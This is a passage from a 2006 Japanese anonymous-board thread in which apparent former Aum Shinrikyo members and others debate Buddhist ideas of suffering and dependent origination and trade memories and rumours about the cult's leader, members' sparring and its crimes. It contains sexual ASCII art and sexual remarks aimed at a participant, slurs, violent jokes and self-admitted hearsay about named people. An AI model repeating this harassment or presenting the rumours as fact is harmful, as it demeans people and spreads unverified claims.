相互依存なんてものが出てくる時点で
本来なら議論の対象外なんですがね。
盲目ゆえの幸福も確かにあるし、私は否定はしませんよ。

765 :名無しさん@3周年:2006/08/27(日) 10:30:32 ID:Z7YFO8Gx
谷垣よりはマシ

766 :阿左谷北:2006/08/27(日) 10:34:41 ID:UfKECvHi
消費税増やすヤシは論外だな。
年収1000万以上のやつからがっぽり取れ。

767 :名無しさん@3周年:2006/08/27(日) 10:38:14 ID:Z7YFO8Gx
>>766
そそ、最高税率も90%に引き上げればいいと思う。
ますます金持ち優遇、弱者切捨ての社会になっていくんだろな〜

768 :阿左谷北:2006/08/27(日) 10:41:40 ID:UfKECvHi
フルタイム労働者が、家庭を築き、子供を育てられるレベルまで戻してほしい。
俺が首相なら、そういう政策をとる。

所得自体下がっているのに、消費税あげようとするとは
人殺しだ。間違いなく自殺者は増えるから。

769 :阿左谷北:2006/08/27(日) 10:49:15 ID:UfKECvHi
3万人以上の自殺者って!
それも、ここ数年続いている。
昔なんて、自殺者がでたら新聞の地方欄に載るくらい少なかったのに。

770 :和井 恵:2006/08/27(日) 10:50:29 ID:HdIJ+5N3
>>751
>これに関してはもう個人によって異なるとしか言い様がないですね。
>理由を認識しても苦がとれない事例が確かにあることはある。
>これは理論で必ずこうなるとは言えないレベルになります。

ごめんね、こんな事例しか紹介できなくて。
しかし、「知らない(認識できない)」からこそ、
その「呪縛を受け続ける」んだけどね…

771 :阿左谷北:2006/08/27(日) 10:53:04 ID:UfKECvHi
経済政策を誤ったとしか思えない。
何が経済大国だ?何が国際貢献だ?
自分の国民の死を増長させながら!

772 :阿左谷北:2006/08/27(日) 10:58:37 ID:UfKECvHi
国民が困った時の蓄えあるのか?この国は。

どんどん湯水の如く外国に金ばらまいて。

まるで、アーレフ信者みたいな金の使い方だな!

773 :和井 恵:2006/08/27(日) 10:58:56 ID:HdIJ+5N3
>>750
>このような苦しみがないのですか?

ID:E/Y8TKj5さんは、

「私はね、苦の滅尽に限定して言うなら
 それはもう達成できたんですよ。」

と言っていますから、おそらくそのような苦しみも、
全て無くなったのではないでしょうか?
そうでなければ、このような発言はしないでしょ?
普通は…

774 :名無しさん@3周年:2006/08/27(日) 11:12:01 ID:E/Y8TKj5
>>773
そうですね、苦への考え方、捉え方は無限にありますから
私の見解と和井さんの見解どちらが優れているかなんてことは
どうでもいいことです。
ただ苦の滅尽は人間にとって魂にとって究極の高みではないということです。
苦の滅尽はおおげさなことではありません。
私はこの宇宙の全てを知りたいと思う。
絶対の境地は苦という限定的なものを取り除いただけでは
訪れないということです。
和井さんも苦の滅尽そのものに主眼を置きすぎないよう
してもらいたいと思います。



 

775 :和井 恵:2006/08/27(日) 11:15:24 ID:HdIJ+5N3
>>754
>無常が苦であると思います。

一般的には、そう言われていますよね。

>無明を滅して、無常であるということを悟っても、

無明を滅していなくても、貴方はちゃんと
「無常である」ということを「悟って」いますよね?
この文章を読む限り…

それは何故ですか?
すでに貴方は、「悟り」を得ているのですか?

>この世界はもともと苦であるということに気付くだけで、
>苦の滅尽には至らないのではないでしょうか?

「この世界はもともと苦である」ということに気付くのが
「悟り」の内容なのだとしたら、確かに「苦の滅尽には至らない」
と、貴方と同じように私も思うでしょうね…

776 :和井 恵:2006/08/27(日) 11:26:30 ID:HdIJ+5N3
>>755
>相互依存というのはですね、人間にはそう知覚できてしまう
>正に虚像なんです。

私は、「時間という概念」の方が「虚像」だと思いますよ。
それに「囚われない」方がいいと思います。

>だが片方の男の足場には物凄い重力があったとする。
>こうなるとその男の方の時間は限りなく遅れていく。

「片方の男の足場」にだけ、
何故「物凄い重力」が発生するのですか?
この「特殊な設定」自体が、「理論のための論理」に思えますけどね。
まぁ、物理学の「重力場と時間」の関係を言いたいんでしょうけど…

あまり意味が無いな、こういう議論は…

777 :名無しさん@3周年:2006/08/27(日) 11:26:50 ID:EvK9loon
釈迦が苦はその生起する因が分かれば滅尽できるようなことを言っている
741部分が気になるんですが、どのような説でしょうか?
因が分かっただけでは滅尽できないのは誰にでも理解できると思いますが。
キャンディさんでもね。w

あんた教団の人じゃないでしょうね?
オウムでも四諦八正道は取り入れたはずですが?

苦しみの生起
苦しみの滅尽
苦しみの滅尽にいたる道

すべては観察すると無常であった ゆえに苦の因である
だから、囚われずにおれと、、
あんたは、ただ話を交ぜ返したいだけで恥をさらしているよ
知らないのか?

778 :和井 恵:2006/08/27(日) 11:32:26 ID:HdIJ+5N3
>>760
>相互依存は虚像である。

サーリプッタは、この「縁起の法」について後輩達から尋ねられ
次のように説明しています。

そこに、「二つのワラの束」が互いに寄り添い合って立っているよね。
(人の文字の形をした二つの束をイメージして下さい)
それらの、どちらでもいいから、片方を取り除いてごらん。
すると、どうなるか?
もう片方は、「自力で立ち続ける」ことができなくなり、
そのまま「倒れてしまう」だろう。
つまり、「お互いに支え合って」いてこそ、
これらの束は「立って(生起して)」いることが出来るんだ。
この関係を「相互依存関係」、つまり「縁起の法」と言うんだよ。

縁起の法とは「存在を成立させている関係(現在)」の分析なのであって、
「存在を成立させている原因(過去)」を分析しているのではありません。

779 :名無しさん@3周年:2006/08/27(日) 11:32:29 ID:Z7YFO8Gx
>>772
ODAは即刻廃止すべきなんじゃない?

780 :名無しさん@3周年:2006/08/27(日) 11:32:34 ID:EvK9loon
>因が分かっただけでは滅尽できないのは誰にでも理解できると思いますが。
キャンディさんでもね。w


なぜ、その説を否定する必要があるんだ?
真面目にシュジュウすることによって、完成すると言われているよ
まあ、そうはいっても、悟る悟らないは個人の資質があるんでしょうけど
だから、オウム流でいえば、まず正見解で見ると
ショウケンカイで見るというのは、四諦にのっとって見るということ

その説を否定するくせに、(うちは釈迦ムニの正当な仏教を継いでいる)と豪語するのは
殴ってやりたいですね
どうして釈迦をバカにするんだろ 鼻が高すぎるよ
まあ、アサハラ教は釈迦ですらバカだと思っているんでしょうね



781 :名無しさん@3周年:2006/08/27(日) 11:37:42 ID:APnuPlJ0
>>775
つまり、無明を滅すると、
無常が苦しみとはならないということですか?
それが「やせ我慢」でないとしたら、
それはそれで素晴らしいことだと思います。

782 :名無しさん@3周年:2006/08/27(日) 11:39:03 ID:EvK9loon
>私はこの宇宙の全てを知りたいと思う。
絶対の境地は苦という限定的なものを取り除いただけでは
訪れないということです。
和井さんも苦の滅尽そのものに主眼を置きすぎないよう

私はあなたが仏教者でないのなら、異論ははさまんが、
仏教徒でありたいなら、その考えは払拭すべきと思いますよ
あんまりくだらないこというと、だからオウムは仏教なんか知らないんだと思われます

教祖ですら言ったのですよ
一番大事なのは無常を悟ることだと 最終解脱の鍵はそれだけと
たとえば、神通を身に付ける
それは結構だが、その神通によって、すべての世界を見、
どこへ行っても、結局は(長い時間の後には、終わるのだ)と
それが高音天であろうと、、いつかは終わると
それを知るための神通だと 
宇宙のすべてを知ったところで、それらが結局は変化するものであり
無常の逝きをでないものであると知るなら
それもまた、人間界の小さい事象と変わらないということを
如実に悟る方が、悟りが早いと思われませんかね?
そういうほうが、(まともな修行)だと、一般には思われていますよ
オウムでもその見解をとるはず


783 :和井 恵:2006/08/27(日) 11:40:11 ID:HdIJ+5N3
>>762
>苦の滅尽をすること。正に苦が生起したから滅尽をする。

私の考え方は違いますね。
「苦が生起した(起きてしまった結果)」ではなくて、
「苦が生起している(という現状認識)」によって、
その状況を成立させている「構成条件」を分析して、
それらの要因を取り外す、ということ。

>すなわち万物は因果関係により定義することしかできない。

私はそうは考えていません。

>二つの関係を無理やり相互依存によって
>同時と見てしまうことは盲目への入り口であること。

貴方にとっては、無理やりに見えるのでしょうね…

784 :名無しさん@3周年:2006/08/27(日) 11:42:43 ID:APnuPlJ0
>>780
E/Y8TKj5はおそらく元サマナ。
理系で科学技術省にいた人でしょう。
自分の頭の良さに多少プライドがあるので、
「キャンディさんでもね」
という表現をとったのでしょう。



785 :名無しさん@3周年:2006/08/27(日) 11:43:04 ID:EvK9loon
悪いけどくだらない議論していない?修行の足しにならないよ
あきれた

786 :和井 恵:2006/08/27(日) 11:48:09 ID:HdIJ+5N3
>>781
>無常が苦しみとはならないということですか?

はい、無常は「苦しみの因」とはなりません。

>それが「やせ我慢」でないとしたら、
>それはそれで素晴らしいことだと思います。

「やせ我慢」をすれば、苦は消えてしまうのですか?

787 :名無しさん@3周年:2006/08/27(日) 11:50:28 ID:EvK9loon
たとえばよ、どんな遠くに素晴らしいものがあろうが
自分はそれを手に取って見ることができない
多分、自分は火星に行きたくても、生きている間に行くことはできないだろう
そこへ行きたい、という願望から抜けるほうが、自分は幸せなんだよね
それは、絶対、仏教者から言ったらそれが正しい見解のはず、、

もちろん、自分が死んだあとも、その成果を受けついデ、後の人が発展させて
くれるかもしれない
そのために役に立ちたいというなら、それはいいと思うけど
自分の意志をもつこと、それが達成されないと、苦痛を感じる因となること
それを考慮すると、、
知りたい、という願望が、まあ、達成されずに死ぬなら、それが苦になるなら
捨てると、そのほうが、修行者にとっては、ステージが高いと言えると漏れは思う


788 :名無しさん@3周年:2006/08/27(日) 11:51:59 ID:APnuPlJ0
>>785
毎日修行している人が、
そう言ったとしたら説得力があるけれど…。


789 :和井 恵:2006/08/27(日) 11:54:23 ID:HdIJ+5N3
>>774
>ただ苦の滅尽は人間にとって魂にとって
>究極の高みではないということです。
>苦の滅尽はおおげさなことではありません。

この部分に関しては、
私も貴方と同じ考え方をしていると思いますよ。

「苦の滅尽」は、完成することなのではなくて、
新たなるステップへの「始まり」なのだと思います。

790 :名無しさん@3周年:2006/08/27(日) 11:56:46 ID:E/Y8TKj5
>>縁起の法とは「存在を成立させている関係(現在)」の分析なのであって、
「存在を成立させている原因(過去)」を分析しているのではありません.
 これはただの言葉のすり替えですね。
関係も原因も同一の現在のものですよ。
ワラが立っている原因は寄り添いあっているからとなります。
同じことを言っているんですよ。

791 :名無しさん@3周年:2006/08/27(日) 11:59:33 ID:APnuPlJ0
>>786
確かに、全く執着がなければ、
無常は苦しみの因とはならない。
しかし、全く執着がないという心の状態には、
なかなか到達できないよ。
単なるあきらめとか無力感なら簡単だけど。

792 :名無しさん@3周年:2006/08/27(日) 12:00:37 ID:EvK9loon
789
考えることが発展的だね
漏れは、煩悩の死滅が、苦のめつじんが、大げさなことでないと
ホザク奴の気がしれないよ
自分だって、完成していないのに
成就者だって、あやしいと思っているのに
教祖だってすごくあやしい
どうして、欲を滅したといいながら、ダキニを置くんだとか
すごい疑問
まあ、ほめられたい弟子は疑問をはさむと教祖の機嫌が悪くなるから
無視して機嫌とって、成就の認定が欲しいのかもしれないけど
もれは、成就の認定なんかいらないから
教祖の矛盾を突付いてやるほうが楽しいね!

793 :名無しさん@3周年:2006/08/27(日) 12:05:14 ID:E/Y8TKj5
>>構成条件」を分析して、
それらの要因を取り外す、ということ。
これは私の言っている因果関係と同じことですよ。いいですか、
1苦が起きている現状認識
2構成条件」を分析する
3見えたそれらの要因を取り外す。
これが因果関係にあるということです。
こ行為自体が既に因果関係にあるんですよ。

794 :和井 恵:2006/08/27(日) 12:05:24 ID:HdIJ+5N3
>>774
>私はこの宇宙の全てを知りたいと思う。

そうですか、頑張って下さいね。

>絶対の境地は苦という限定的なものを取り除いただけでは
>訪れないということです。

貴方の言う「絶対の境地」というものが、
私には良く分からない(ピンとこない)な…
「全知全能」になる、ということなのかしら?

795 :名無しさん@3周年:2006/08/27(日) 12:06:23 ID:APnuPlJ0
>>792
人の悪口を言うだけでは幸福になれないよ。

796 :名無しさん@3周年:2006/08/27(日) 12:07:07 ID:EvK9loon
ヴァジラヤナでは、グルが黒いものを白、といっても、弟子が疑問をもたない
ところまで帰依させると
(これは真偽の程はしらないのだが)村井のいる前で、教祖はダキニとセックスして
見せたんだとか、、
で、サマナの前で、村井に向かって(私が女遊びにふけったらどうする、)と
村井は(ハイ、ついていきます)と。村井はセイタイシである。

こういう奴が、セイタイシになれるんだよ、わかったかお前ら。
早く成就したければ、この村井のように、例え私が女を抱こうとも
いちいち文句をつけないことだ、と釘をさしやがった。。

797 :名無しさん@3周年:2006/08/27(日) 12:09:50 ID:E/Y8TKj5
和井さん自身のことで一つ例をあげて話してもらえませんか?
和井さん自身自分のいくつかの苦を滅尽した体験の一つを
説明してもらえたら収拾がつく気がします。
どんな苦でも結構ですから。

798 :名無しさん@3周年:2006/08/27(日) 12:10:19 ID:EvK9loon
795
ずうずうしいだけでは、弟子はついてこないよ
まあ、自分が好きにやれる世界を作りたかったんだね
こんなおやじにもらった成就認定など、もし漏れがもらっても
破り捨ててやるね
勝手なばかりだよ

799 :和井 恵:2006/08/27(日) 12:11:10 ID:HdIJ+5N3
>>793
>これが因果関係にあるということです。

一般的に、「因果関係」とは、「過去・現在・未来」といったような
「時系列的な流れ」をイメージしますよね。
私は、そのような関係として捉えてはいけない、と言っているのです。

「今、この一瞬(現在そのもの)」に意識を集中する必要がある、
と主張しているのです。修行を進める為にはね…

800 :名無しさん@3周年:2006/08/27(日) 12:12:33 ID:EvK9loon
>(これは真偽の程はしらないのだが)村井のいる前で、教祖はダキニとセックスして
見せたんだとか、、

なんかの暴露本で見たと思うんだけど、、弟子に向かって、(なあ、お前も早く
成就しろよ、こういうことができるんだから)って言ったとか
ダキニとグチャグチャやりながら


801 :和井 恵:2006/08/27(日) 12:15:30 ID:HdIJ+5N3
>>790
>関係も原因も同一の現在のものですよ。

そういう「認識(同一の現在のものですよ)」が出来ているのならば、
関係という言葉を使おうが、原因という言葉を使おうが、どちらでもいいのです。
それは、大した問題ではありません。


802 :阿左谷北:2006/08/27(日) 12:15:39 ID:UfKECvHi
>>779
ODAって?
無知な俺自身にσ゚(^Д^)゚・プギャー!!

803 :名無しさん@3周年:2006/08/27(日) 12:15:59 ID:wP02Yztp
スカイラークで馬鹿食いしてる豚がどんなこと言っても無理

804 :名無しさん@3周年:2006/08/27(日) 12:18:25 ID:EvK9loon
こういうグルだからさ、田口みたいなまともな人が
真島が死んだのを勝手にドラム缶焼却したのを、尊敬できなくなった
やめたい、といったのさえ
(尊敬できなくてあたりまえだ)
殺してしまえ、と

田口がそこにいた、というのが彼の不運なところだ
私だって同じこといったと思う
教祖はブルドーザーのように進み、自分の前にいる奴は、誰でも邪魔なんだ
で、やってはいけないことをするものだから
弟子がケチつけてこないように、バカみたいに盲目的に帰依させて
、、盲目的帰依を要求するのはなぜか、
自分が、弟子を持ちつつ、しかもワガママを通したいからさ!
弟子は犬に過ぎん

805 :名無しさん@3周年:2006/08/27(日) 12:18:47 ID:Xs7vRni1

今日のキャンディ

ID:EvK9loon



                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | 漏れ キャンディ
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 

806 :名無しさん@3周年:2006/08/27(日) 12:18:58 ID:E/Y8TKj5
和井さんと私の見解は言葉の使い方が違うだけで
何だか似ている気がしますよ。


807 :阿左谷北:2006/08/27(日) 12:20:25 ID:UfKECvHi
>>800
>>ダキニとグチャグチャやりながら
↑この表現できるキャンディに大人のエロチシズムを感じた。

808 :名無しさん@3周年:2006/08/27(日) 12:22:30 ID:EvK9loon
もしダキニと寝ているところを、弟子が見咎めて
(なにしているんですか、ばらしますよ)といったら
そいつのことも殺したんじゃないのかね?

こういうことをする私が悪いのでなくて、邪魔をするお前が悪いってのが
教祖の理論だもの
すべてがそうじゃん!
私が何をしても口を出すな、真理の実践の邪魔だ
私が殺そうが、セックスしようが、私が責められるべきでない
責めようとするお前が悪いのだ!って、、

あんたら、それでいいんですか?危険きわまりない


809 :名無しさん@3周年:2006/08/27(日) 12:25:54 ID:EvK9loon
グルが殺人した、グルがセックスした、しかし弟子である私は
それをすんなり、疑問を持たず受け入れることができた
ああ、私は帰依の実践ができている
一番の弟子になれるかもしれない
そういう奴と、利用してやりたいグルの茶番だろ?

腐敗臭がしますわ

810 :和井 恵:2006/08/27(日) 12:27:43 ID:HdIJ+5N3
>>791
>確かに、全く執着がなければ、

私は、「全く執着がなければ」などとは一言も言っていませんよ。
それは貴方の勘違いです。
まぁ、「一時的に」そういう状態になることは、
必要だとは思いますけどね…
もちろん「過度の(行き過ぎた)執着」は有害でしょうけど。

>無常は苦しみの因とはならない。
>しかし、全く執着がないという心の状態には、
>なかなか到達できないよ。

うん、だから現代的なやり方としては、
密教的な「変容させてゆく方法」の方が
適しているように思います。
過去の事例(チベット密教など)を見ても、
「在家成就(出家をしないで解脱・悟りを得る)」
をしているのは密教系だものね…

>単なるあきらめとか無力感なら簡単だけど。

簡単だけど、それでは何も変わらないよね…

811 :阿左谷北:2006/08/27(日) 12:29:55 ID:UfKECvHi
今の俺なら、麻原にヤラレる前に、やっちまうだろうが、
ニイミにやられそうだな。
ニイミと一対一で武道でデスマッチもしたかった。
あいつら相手なら、ヒグマの如く獰猛になれそうだ。

812 :阿左谷北:2006/08/27(日) 12:35:37 ID:UfKECvHi
実際、昔のオウムで男のサマナ同士、
格闘させて、誰が一番強いか競ったそうだ。
俺、その話し聞いて、激しく燃えた!
俺もやりたかった!と

しかし、間違って最強になったりでもしたら
麻原のボディガードにさせられたんだろうな。。

813 :名無しさん@3周年:2006/08/27(日) 12:37:50 ID:wasCwbhX
麻原は、仏教・ヨーガの皮を被った、アルカイーダじゃなかったのか?
キチガイ以外のなにものでもない。

814 :名無しさん@3周年:2006/08/27(日) 12:39:34 ID:E/Y8TKj5
>>812
武道といえば私は合気道の考え方もすきです。
合気的な奥義の考え方として
「自分を殺しに来た相手と友達になる」という説がありますが
惹かれるものがあります。

815 :名無しさん@3周年:2006/08/27(日) 12:39:45 ID:wasCwbhX
アルカーイダに謝っておく。スマソ

816 :阿左谷北:2006/08/27(日) 12:40:38 ID:UfKECvHi
基地がいだよ。チヅオは。
ニイミも基地がい。
ああいう奴が死刑になっても、何の憐れみも感じないね。

817 :和井 恵:2006/08/27(日) 12:43:43 ID:HdIJ+5N3
>>797
>和井さん自身のことで一つ例をあげて話してもらえませんか?
>和井さん自身自分のいくつかの苦を滅尽した体験の一つを
>説明してもらえたら収拾がつく気がします。
>どんな苦でも結構ですから。

ごめんね、時期が来たらちゃんと話すから。
今はちょっと、「ある理由」があって、具体的には言えないの。

ただ、「在ること」が解る(実感できる)と、
「全ての苦しみは消えて無くなる」のです。

700さんが書いていた、

>年老いて劣化する苦しみ、
>少しずつ形状容姿が醜くなっていく苦しみ、
>死の苦しみ、
>死後、親しかった人や愛した人と会えなくなる苦しみ、

このような苦しみは、全て消えて無くなるのです。

818 :名無しさん@3周年:2006/08/27(日) 12:44:37 ID:EvK9loon
てか、実行犯が裏でやっていたことの大きさを考えると
こいつら修行するヒマあったのかね?と思うよ

新見とかアナンダとか、修行しているより、変な悪巧みに汗流すほうが
多かったんじゃないの
それでも、それが教祖の指示であり、お気に入りであれば
ステージ上がるんでしょう?
そういう成就認定と それがバクティだもんね

819 :名無しさん@3周年:2006/08/27(日) 12:46:03 ID:EvK9loon
  首のホネ 折った数だけ ステージUP

by NIIMI

820 :阿左谷北:2006/08/27(日) 12:47:48 ID:UfKECvHi
>>814
合気道は殺しにくる相手から身を守るような構えが多いですね。
武士が丸腰で刀や槍を持った相手と戦うための
武道に見えます。

821 :名無しさん@3周年:2006/08/27(日) 12:55:13 ID:E/Y8TKj5
合気道開祖の言葉として
「大宇宙を師として精進している私の創造物は武である。
すべて武を行ずるものは、自己の体内から武を生み出すことができ
自己の道を開くことができるようにならなくてはいけない。」
私も肉体鍛錬に精を出していますがこの考えが
とても武の真理のようで好きです。


822 :名無しさん@3周年:2006/08/27(日) 12:57:14 ID:mvOLA8sQ
スポーツ観戦好きのあなたは、千葉ちゃんのラストランを見よう!

2006北海道マラソン
http://uhb.jp/event/official/2006maraton/maraton_top.html

823 :和井 恵:2006/08/27(日) 12:57:37 ID:HdIJ+5N3
>>812
>実際、昔のオウムで男のサマナ同士、
>格闘させて、誰が一番強いか競ったそうだ。
>俺、その話し聞いて、激しく燃えた!
>俺もやりたかった!と

私は「その時の現場」に居ましたよ。
みんなかなりマジで闘ってたから、
人によっては、顔からかなりの「流血」をしていた…

優勝者はガフヴァ(端本くん)だった。

824 :阿左谷北:2006/08/27(日) 12:57:49 ID:UfKECvHi
その全サマナの戦いに勝ち残ったのは
空手(組技ありの流派)の有段者だったらしいね。

名前は忘れたけど、一連の事件にからんでいたはず。

825 :名無しさん@3周年:2006/08/27(日) 13:04:36 ID:E/Y8TKj5
>>817
ではその時まで和井さん御自身の滅尽体験談が聞けるのを
お待ちしています。

826 :阿左谷北:2006/08/27(日) 13:06:07 ID:UfKECvHi
>>821
塩田剛三師の師匠のお言葉ですね。

武と言う漢字の意味は、「戈」(ほこ)を「止」めるという
意味だそうです。

剣道に精通した人が言ってました。

827 :阿左谷北:2006/08/27(日) 13:11:30 ID:UfKECvHi
>>823
そうですか!
ベスト4のメンバーは覚えていますか?
端本以外で。

ニイミとか、ヴァジラティッサ、あと中村なんかも強そう。

828 :和井 恵:2006/08/27(日) 13:18:02 ID:HdIJ+5N3
>>825
>ではその時まで和井さん御自身の滅尽体験談が聞けるのを
>お待ちしています。

ありがと^^


829 :阿左谷北:2006/08/27(日) 13:22:37 ID:UfKECvHi
武道って、受け身を覚えると益々面白いですね。
だんだん、相手の攻撃に冷静に対処できそうな気がして。
まず、目を逸らさず相手をよく見るのが、
恐怖でなかなか出来ないのですよ。
普段から、相手をよく見るなんてことすらしないですから。
でも、武道は目を逸らしたら負けですよ。

830 :和井 恵:2006/08/27(日) 13:25:03 ID:HdIJ+5N3
>>827
>ニイミとか、

確か「レフリー役」をしていたと思う。

>ヴァジラティッサ、

この人は「武闘派」ではありませぬww
ちょっと太めのお医者さん。

>あと中村なんかも強そう。

うん。基本は柔道だったけど、
私は彼と「スパーリング」をして、
鼻を殴られたことがある^^
かなり強いよ。

831 :阿左谷北:2006/08/27(日) 13:27:57 ID:UfKECvHi
武道の相手をよく見ると言うのと
仏教のものごとをありのままに見ると言うのは
何か通じ合う感じがしますね。
違いますかね(笑)

832 :名無しさん@3周年:2006/08/27(日) 13:33:32 ID:EvK9loon
ごく初期の頃、はじめてメッタジに面談してもらったときのこと
個室で二人で会っていると
(オウムには、まったく男性経験がなくて、出家した若い子もたくさん
いるんだよね〜)って、意地悪い目つきをしていったんだよ
いきなりね、それ以前に、性的な話題は出ていなくて
ただ、ニヤニヤいじわるい顔をして、そう切り出したんだわ
あとから、とてもほがらかな師になったけど
最初のころは修羅っぽくてさ 人を馬鹿にしているようなところがあった

ちなみに、漏れは事実男性経験は早くにあったし、そこらへんはマセガキだった
奴は、なんらかの神通で、漏れのデータを見たのだろうと思う
で、事実中にはとても、清らかそうな男性経験の無いまま
出家した若い女性もたくさんおるであろうと、、

しかし、そのヒトらが、教祖を見てどうして、批判的にならないのか不思議だ
私が男性経験があったら、なじるじゃないか
いやらしい汚い者でも見る目で
教祖はなんだよ?

833 :阿左谷北:2006/08/27(日) 13:35:07 ID:UfKECvHi
>>830
和井さん、大変な目に遇いましたね。
柔道やってる人に捕まえられたら逃げるのは困難でしょうね。
チヅオも柔道やってたから力はあったんだろうと思う。
視力が正常だったら、かなり強そう。
ニイミはレフェリーですか。やはり、別格だったんですね。

834 :和井 恵:2006/08/27(日) 13:36:02 ID:HdIJ+5N3
>優勝者はガフヴァ(端本くん)だった。

私は彼とは、けっこう仲が良かった。
「アフリカツアー」の時も「同室」だったしね…

その時、少し「坂本事件」の話も出たんだけど、
まさか彼が関わっていたとは、その時は夢にも思わなかった。
その彼の写真がテレビで流れ始めたときは、凄いショックだったね…

835 :和井 恵:2006/08/27(日) 13:37:51 ID:HdIJ+5N3
>柔道やってる人に捕まえられたら逃げるのは困難でしょうね。

いや、彼は「ボクシング」をしかけてきたよ^^;
柔道の技は、使わなかった。

836 :阿左谷北:2006/08/27(日) 13:40:23 ID:UfKECvHi
>>834
せっかくの武道も、犯罪に使ったら、ただの凶器ですね。

837 :名無しさん@3周年:2006/08/27(日) 13:41:18 ID:EvK9loon
「アフリカツアー」の時も「同室」だったしね…

ナニしにいったの?

838 :阿左谷北:2006/08/27(日) 13:45:16 ID:UfKECvHi
>>835
やはり、柔道の素人に柔道で戦うのに
気後れしたんでしょうか?
しかし、柔道家のパンチは重いでしょうね。
中でもウパーリ師は体格がよかったらしいので。
ところで、和井さんとウパーリ師、どちらが優勢でしたか?

839 :名無しさん@3周年:2006/08/27(日) 13:50:29 ID:EvK9loon
私が年若くて男性経験があったら、穢れがあるってなじる原因になるのに
出家僧のくせに、妻を手放さず、しかも愛人までウヨウヨいるのを
平気で拝めるんだモノ
(教祖は都合のいいときだけ在家ね、てか、教祖が在家でいなければならない
 理由など一つも無い、あるとすればセックスしたいときにできるように
 在家でいたいってくらいよ どうして、自分で出家空間作っておきながら
 自分は出家しないんだ?)

貴様らの考回路ってどうなってんの?

840 :和井 恵:2006/08/27(日) 13:50:42 ID:HdIJ+5N3
>>837
>ナニしにいったの(「アフリカツアー」)?

倉庫に余っていた(備蓄していた)食料(古米や粉ミルク?)や、
衣料品などを買って、「貧しい人々に分け与える」(天界のカルマを創る?)
まぁ、ボランティア活動かな…
で、その写真と記事を、後で教団誌に載せたと思うけど。

841 :阿左谷北:2006/08/27(日) 13:53:25 ID:UfKECvHi
>>832
キャンディさんの非処女しか出せないフェロモンが
個室の中に充満していたんだよ。
きっと、メッタジもメッタにないくらい、反応したんでしょう。

842 :名無しさん@3周年:2006/08/27(日) 13:54:52 ID:Ecp9vQ1v
端本は大道塾の全日本大会で、確か特別賞か何か貰ってる選手だからね。
強いはずだよ。
大道塾はフルコンタクトで、防具付けての顔面攻撃アリ&寝技ありだからね。
日本拳法とほぼ同じ。

843 :和井 恵:2006/08/27(日) 13:57:00 ID:HdIJ+5N3
>ところで、和井さんとウパーリ師、どちらが優勢でしたか?

ウパーリ師は、うろ覚えだけど、確か、
プロレスラーを目指していた時期(出家前に)があったような気が…
彼も強いと思ったなぁ。

私は「練習試合」とかはダメなの。
「何でもあり(ルール無し)」の方がいい^^
それに、相手が仲間じゃね…
(これは、単なる言い訳だからね。深く考えないように。)


844 :名無しさん@3周年:2006/08/27(日) 13:57:53 ID:APnuPlJ0
>>833
尊師は極真空手の2段を持っている。


845 :和井 恵:2006/08/27(日) 13:59:40 ID:HdIJ+5N3
>>840
 × → 衣料品などを
 ○ → 医薬品などを

846 :阿左谷北:2006/08/27(日) 14:00:37 ID:UfKECvHi
>>842
そそ!大道塾。
全日本で賞も取ったんですか。
絶対犯罪に使っちゃ駄目だね。武道は。
清く、正しく、爽やかな人間を目指さないと。

847 :名無しさん@3周年:2006/08/27(日) 14:03:42 ID:tQYHCEj0
ガフヴァは一度俺に「坂本弁護士」事件のことを聞いてきたことがあった。
「教団がやったと思いますか?」って。
俺は「わからない」って答えたけど。

ガフヴァは戦っていたんだと思う。
罪悪感といつも戦っていたんだと思う。


848 :名無しさん@3周年:2006/08/27(日) 14:05:26 ID:FEvK/onC
尊師には深い深いお考えがあるのです
深すぎてわからないのです


849 :阿左谷北:2006/08/27(日) 14:05:52 ID:UfKECvHi
>>843
はい、確か、プロレスラー目指していたと聞きました。
しかし、なんでもありなら、和井さんには敵いませんよ。
>>844
柔道だけじゃなく、極真も有段者なんだ!初耳です。

850 :名無しさん@3周年:2006/08/27(日) 14:07:09 ID:FEvK/onC
マイトレーヤもパディーナムッタもどうしちゃったのでしょうか?


851 :名無しさん@3周年:2006/08/27(日) 14:11:42 ID:EvK9loon
840
なんか、ザイールってところへいった?
エボラ菌を入手しようって、動きがあったとかなかったとか、、
調べてはいたんだよね
ヴァジラヤナサッチャに乗っていたもの
漏れは、あの記述を三度読んで、マジで胃が気持ち悪くなった
本当に気持ち悪かった

もどきのいうには、(宛てにならんよ)特効薬のない菌を持ち帰っても
自分たちがかえってやられてしまうから、あきらめたんだろって
サリンは解毒剤を自分らで持っていたから、万一自分で吸い込んでも
助かるけども

852 :和井 恵:2006/08/27(日) 14:13:42 ID:HdIJ+5N3
>>832
彼(メッタジ・越川くん)は、出家して一番最初は、
私の所属するデザイン班の岐部さん(マハー・カッサパ)の
「預かり」という形になった。
物腰が柔らかくて、いつもニコニコした感じ。
でも、昔は「ホスト」をしていたことがあるという話が…

ある時、ガフヴァと彼が「スパーリング」をしたことがある。
その後で端本くんは、「彼は強いよ」と言っていた。
決して相手から目をそらさずにいて、攻撃を受けても平気な顔をしていた。
彼が端本くんから「強い」と言われたのは、
「心が弱気にならずに常に積極的」だったからじゃないだろうか。

853 :阿左谷北:2006/08/27(日) 14:17:06 ID:UfKECvHi
なんか、オウムってナチスや731部隊の影響受けてない?細菌兵器やら毒ガスやら。
こんな不穏な教団の動きを警察が事前に察知出来なかったのもヤバクない?

今は大丈夫なんだろうか。

854 :名無しさん@3周年:2006/08/27(日) 14:20:35 ID:EvK9loon
漏れ、一時期、気が狂ったことがあるんだよ
好きな人のことで、アナハタが詰まったのか、、苦しくてたまらないんだけど
物理的に、胸が苦しくて呼吸がしにくい感じまでして
